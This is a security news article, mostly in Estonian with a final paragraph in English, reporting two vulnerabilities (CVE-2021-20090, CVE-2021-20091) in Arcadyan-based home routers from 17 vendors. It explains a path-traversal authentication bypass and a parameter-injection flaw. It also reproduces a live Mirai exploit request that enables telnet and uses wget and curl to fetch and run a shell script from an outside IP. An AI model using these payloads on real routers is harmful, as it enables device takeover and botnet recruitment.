Haavatavus kodustes ruuterites, katab 17 tootjat

Veres on tuvastatud ulatuslik rünnak koduste ruuteri vastu, mille tarkvarades kasutatakse Arcadyani poolt loodud http-serveri versiooni. Seadmete üle kontrolli saamiseks rakendatakse kahte haavatavust, mis võimaldavad kaugelt täita suvalist koodi root-õigustega. Probleem puudutab üsna suurt valikut ADSL-ruutereid ettevõtetelt Arcadyan, ASUS ja Buffalo, samuti seadmeid, mis on tarnitud Brändide kaudu nagu Билайн (probleem on kinnitatud Smart Box Flashis), Deutsche Telekom, Orange, O2, Telus, Verizon, Vodafone ja teised teenusepakkujad. Toodud probleem on olnud Arcadyani tarkvarades üle 10 aasta ja selle aja jooksul on see jõudnud vähemalt 20 seadme mudelisse 17 erinevalt tootjalt.

Esimene haavatavus CVE-2021-20090 võimaldab juurdepääsu igale veebiliidese skriptile autentimiseta. Probleem seisneb selles, et veebiliideses on mõned kataloogid, kuhu edastatakse pildid, CSS-failid ja JavaScripti skriptid, saadaval ilma autentimiseta. Samas kontrollitakse katalooge, millele on lubatud juurdepääs ilma autentimiseta, algse mustri järgi. Teel sümbolite „../” kasutamine ülemisse katalooge blokeeritakse, kuid kombinatsioon „..” läbib kontrolli. Nii on võimalik avada kaitstud lehti, saates päringuid, nagu näiteks „http://192.168.1.1/images/..index.htm”.

Teine haavatavus CVE-2021-20091 võimaldab autentitud kasutajal muuta seadme süsteemi seadeid, saates spetsiaalselt koostatud parameetrid skripti apply_abstract.cgi, mis ei kontrolli, kas parameetrites on olemas reavahetuse sümbol. Näiteks ründaja võib ping-operatsiooni käigus määrata kontrollitava IP-aadressi väljale väärtuse „192.168.1.2ARC_SYS_TelnetdEnable=1” ja skript, luues seadistuste faili /tmp/etc/config/.glbcfg, kirjutab sellesse rea „AARC_SYS_TelnetdEnable=1”, mis aktiveerib server telnetd, mis võimaldab piiramata juurdepääsu käsureale rooti õigustega. Samamoodi saab parameetri AARC_SYS seadistamisega süsteemis käivitada ükskõik millise koodi. Esimene haavatavus võimaldab probleemset skripti käivitada autentimiseta, liikudes temani nagu „/images/..apply_abstract.cgi”.

Vulnerabilities can be exploited if an attacker can send a request to the network port where the web interface is running. Judging by the dynamics of the attack's spread, many operators leave access to their devices from the external network to simplify problem diagnosis by support services. If access to the interface is restricted to only the internal network, the attack can be executed from the external network using DNS rebinding techniques. Vulnerabilities are already actively being used to connect routers to the Mirai botnet: POST /images/..apply_abstract.cgi HTTP/1.1 Connection: close User-Agent: Dark action=start_ping&submit_button=ping.html& action_params=blink_time5&ARC_ping_ipaddress=212.192.241.7 ARC_SYS_TelnetdEnable=1& ARC_SYS_=cd+\/tmp; wget+http://212.192.241.72/lolol.sh; curl+-O+http://212.192.241.72/lolol.sh; chmod+777+lolol.sh; sh+lolol.sh&ARC_ping_status=0&TMP_Ping_Type=4

Allikas: opennet.ru

Osta usaldusväärne veebihosting DDoS kaitsega, VPS VDS serverid 🔥 Osta usaldusväärne veebihosting DDoS kaitsega, VPS VDS serverid | ProHoster